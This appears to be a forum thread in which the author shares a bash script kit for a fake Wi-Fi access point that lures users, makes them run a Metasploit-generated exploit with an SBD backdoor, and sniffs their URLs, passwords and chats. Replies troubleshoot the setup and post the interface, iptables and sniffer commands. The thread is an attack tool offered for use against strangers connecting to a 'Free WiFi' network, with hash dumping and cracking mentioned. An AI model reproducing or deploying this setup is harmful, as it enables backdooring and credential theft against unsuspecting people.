[Tutorial] How to: Create Fake AP (with a auto bash script!)

[imported_g0tmi1k]

Links
Commands: http://pastebin.com/f3971a16b
Download 7z: http://www.mediafire.com/download.php?ykobuygmiyn


What is this?
I've had a go at making a bash script to automate creating a 'Fake AP' (Access Point) and 'pwn' who connects to it!
This is a bash script and a few other things to make a fake access point which is transparent (allowing target afterwards to surf the Inter-webs after they have been exploited!).


How does this work?
> Creates a fake AP and DHCP server.
> Runs a web server & creates an exploit with metasploit.
> Waits for target to connect, download and run the exploit after it allows them to surf the Inter-webs.
> Uses a backdoor, SBD (Secure BackDoor - bit like netcat!), though this could be replace with VNC if attacker wishes!
> Then starts a few 'sniffing' programs (dnsiff suite) to watch what target does!


What do I need?
> Two interfaces, one for Internet (wired/wireless) and the other for becoming an access point (wireless only!)
> A Internet connection (though you could mod it so its non transparent)
> airmon-ng, dhcpd3, apache,metasploit, snarf suit <--- All on BackTrack!


Whats in the 7z file?
> FakeAP_pwn.sh <--- Bash script to run
> FakeAP_pwn.rc <--- Metasploit resource
> sbdbg.exe <--- Backdoor
> dhcpd.conf <--- My DHCP script (in-case you need it)
> index.html <--- The page the target is force to see before they have access to the Internet.


How to use:
1.) Extract the 7z file to /root/FakeAP_pwn.
2.) Edit FakeAP_pwn.sh with your gateway, Internet interface, wireless AP interface.
3.) sh /root/FakeAP_pwn/FakeAP_pwn.sh
4.) Wait for a connection...
5.) Game Over.


Notes:
It works for me (=
I'm running BackTrack 4 Pre Final, The target is running Windows XP Pro SP3 (fully up-to-date 2009-03-25), with no firewall and no AV. Not tested with anything else!
The connections is reverse - so the connection comes from the target to attacker therefore as the attacker is the server it could help out with firewalls...
There is stuff comment out; the stuff at the end I want to happen, the other stuff is other methods of doing the same thing!
FakeAP_pwn.7z (17.7KB, MD5 006ee8522deb5c4d71c754e94282a516)

Blog Post:http://g0tmi1k.blogspot.com/2009/06/...e-ap-with.html
Forum Post: http://forums.remote-exploit.org/wir...sh-script.html



~g0tmi1k

[fnord0]

bravo! I am grabbing it right now, will give it a shot (something new to play with) ... as I have yet to mess with fakeAPs...it just so happens I was tonight looking thru these forums and ran into some great posts dealing with just this subject (and karmetasploit), but most of the posts have alot to do with BT3 -- yet I'm sure alot easily applies to backtrack4 (pre final). thanks for the effort, this will put me on the right track for sure, I will report back with my experience!

[Virchanza]

Gonna give this a go myself too... I'll let cha know

[roonie]

hi,

i have followed what you have done. my client recives an ip address from DHCP but it cant ping the server

i do ipconfig on my client and i get
ip add 10.0.0.20 and a gatway of 10.0.0.1

when i try to ping 10.0.0.1 it times out i dont understand

i assume since i have recive that ip address from my server it must see it but it just can seem to use the internet or ping it please help

[fnord0]

I gave 'er a go, and I gotta say it worked (( with some changes )) I am quite impressed tho, very cool congrats! this helped me a lot with my first go at fake APs. I am running an alfa awus050nh 802.11a/b/g/n USB device, off the rt2800usb (rt2x00-based) module-set. so I dunno if that came into play why I had issues or not?
(( again this was my first fakeAP use, so I am gonna tell ya what I had to do to get it to work with yr script, but please don't laugh if I spout off something that should be considered a given when working with this type of environment... i am just new to it is all ))

- I added the following variables (well, changed fakeap_interface) to yr script after some troubleshooting with airbase-ng not starting correctly on my BT4pf box ::

export fakeap_interface=mon0 <<-- I tried wlan0, but airbase-ng complained (my konsole buffer got overwritten, so I cant give specifics), it essentially wanted monitor mode
export fakeaphome=/root/wifi/FakeAP_pwn <<-- I wanted to run yr tool in my own dir (( I then called yr scripts using $fakeaphome ))
export airbasehome=/usr/sbin/airbase-ng <<-- most calls for xterm worked "right out of yr archive", but the call for airbase xterm session would die everytime! I tested, and found I had to call airbase-ng with full path ($airbasehome), and BAM it worked (not sure why??)
export dhcpdhome=/usr/sbin/dhcpd3 <<-- another xterm oddity, this time with dhcpd3 ( root's $PATH variable includes /usr/sbin, so I not sure why I have to call the full path, but it's required on my box, in this script )

---------------------------------------------E D I T---------------------------------------------

ok, change up... instead of all the "export $toolnamehome" bs, I kept the "export fakeaphome=/root/wifi/FakeAP_pwn" so I could still use yr script in it's own dir...
then created a new "export toolsdir=/usr/sbin" ala airoscript
then just put "$toolsdir/" in front of each call to the tools airbase-ng, dhcpd3, urlsnarf, dsniff, and msgsnarf. (as they all resided in /usr/sbin, easy enuff)

after those changes, I started yr script and just about everything else but dhcpd worked... I fired up my upstairs computer, configured by atheros/mad-wifi-based card to connect to the new "Free WiFi" AP, and .... no IP address, unable to pull DHCP! manually configuring 10.0.0.2/24 worked, and I was able to ping 10.0.0.1!

now, I cannot for the life of my figure this part out?! dhcpd3 with BT4 pre final... I kept getting this error, and dhcpd3 would die ::

Code:

Can't open /root/wifi/FakeAP_pwn/dhcpd.conf: Permission denied

now, I would get that calling dhcpd3 from command line, or thru yr script, everywhere! if I'm running the command line (as taken from yr script) "/usr/sbin/dhcpd3 -d -f -cf /root/wifi/FakeAP_pwn/dhcpd.conf at0" I can duplicate the above error everytime (yes, I own the dir & file, 777 permissions, user:group = root:root -- I'm root for christ sake's, but I did check and re-chown/re-chmod...), BUT if I move the dhcpd.conf file to /etc/dhcp3, but I get this damned error, yet the dhcpd server would work flawlessly ::

Code:

Can't open /root/wifi/FakeAP_pwn/dhcpd.conf: Permission denied

I ended up with the following line for my change to yr script for calling "dhcpd3" ::

Code:

xterm -geometry 75x25+1+100 -T DHCP -e $dhcpdhome -d -f at0&

also, I notice @ near the bottom of yr script you explicitly call the following on wlan0 ::

Code:

xterm -geometry 100x10+470+0 -T URLs -e urlsnarf -i wlan0&
xterm -geometry 100x10+470+150 -T Passwords -e dsniff -i wlan0&
xterm -geometry 100x10+470+300 -T "IM Chat" -e msgsnarf -i wlan0&

I'd suspect one would want to change wlan0 to $fakeap_interface, as in my case I had to run it off "mon0" interface.

I too would like to see the things you got listed at the very bottom of yr script, but first I need figure out what they do! hahaha, I've yet to play too much with metasploit... and since I was running linux on the box I had connecting to the fakeAP, I couldnt test out the metaspolit hack you had (SBD... wine? ha).

all in all, excellent learning tool! and a great tool to pentest yr own W/LAN. good stuff! consider me a fan

[imported_g0tmi1k]

fnord0,
WOW! Thanks for testing! & thanks for the thanks
I was using:
> inbuilt Acer 5920 WiFi (Intel iwl4965?) - wlan0
> USD Linksys WUSB54GC - wlan1

Dude, don't worry - the script was made for me and me only =P
I'm glad that it works on other peoples setup, tho I might now make v2 or something which is more "universal". The settings which are there at the only things which I need to "tweak". I might end up making more settings, which has path to files etc

And thanks for pointing out "wlan0", I forgot to change them after I was testing it out! Think it needs to be "at0", tho I'm not too sure...

I missed out the bit, where I compiled sbd in bt4 (tho I will correct this asap), though I could try and do it from wine, using the same file...

The bit at the bottom is metasplot stuff, get system info, get username, get hashs (and then crack them with john the ripper!)

Its odd that you have to give the path to the programs, I wouldnt why that is, as we both are using backtrack 4 pre final

btw, happy learning



Virchanza,
Please do! More input the better (though you can see that its not perfect...yet (; )



p.s. Thanks for the vote

[arthurbunsky]

Works for me, just changed ssid, interfaces, done. Thanks for sharing. o/

Edit: Also, this helps me understand how to share internet with people. Years ago, I would have clicked >9000 times through a variety of windows, configured settings on clients, all that tedious stuff. Now, I'd just remove the payload/exploit/fun section, tweak as I like and there we go.

Many thanks, blessings, and {0,1,2,3...w} internets to you, my good sir.

Post Septum

You could disable payload stuff and fire up hamster/ferret - beautiful.

[imported_frozen]

i tried to mod the script, to get a non transparent ap:

ifconfig at0 up
ifconfig lo up
ifconfig at0 10.0.0.1 netmask 255.255.255.0
ifconfig at0 mtu 1400
route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
echo 1 > /proc/sys/net/ipv4/ip_forward
iptables -t nat -A PREROUTING -p udp -j DNAT --to 10.0.0.1
iptables -P FORWARD ACCEPT
iptables -t nat -A PREROUTING -p tcp --dport 80 -j DNAT --to 10.0.0.1

but it still does not work, any ideas?

[imported_g0tmi1k]

Here is the notes which Ive made for making a fakeAP (non transparent mode)
http://pastebin.com/f1333c8f3

Does that help?

[fnord0]

fnord0,
WOW! Thanks for testing! & thanks for the thanks
I missed out the bit, where I compiled sbd in bt4 (tho I will correct this asap), though I could try and do it from wine, using the same file...

no problem! i really dig yr work/post.
would you by chance mind elaborating a bit on the second part of yr quote here, as I am really interested in what your script is attempting to do with sdb + metasploit? I don't follow, as I am new to metasploit... I am still in early stages of learning it, I get all the LHOST, RHOST commands, etc. but I don't understand how one would properly call the sdb part in yr script. I'd love to understand more though, if you don't feel like typing it all out, a link to metasploit's sbd.exe would be great. I am not having much luck with thier site/google locating a good tutorial for what yr script is doing with sbd.exe

i found this codeBurst: March 2007
this codeBurst: Just some simple shell notes:
but most links to the root sdb page, takes me to this borken page = http://tigerteam.se/dl/sbd/

i get the gist that sbd is a "secure backdoor" and is similar in workings to netcat, but I'm just not getting what your script is doing specifically with it, and what u are meaning in the quote above.

thanks for any light you can shed, or anywhere you may want to point me for more info (I downloaded all the metsploit docs, and pdfs, but cant find anything there about sbd).
-peace-
fnord0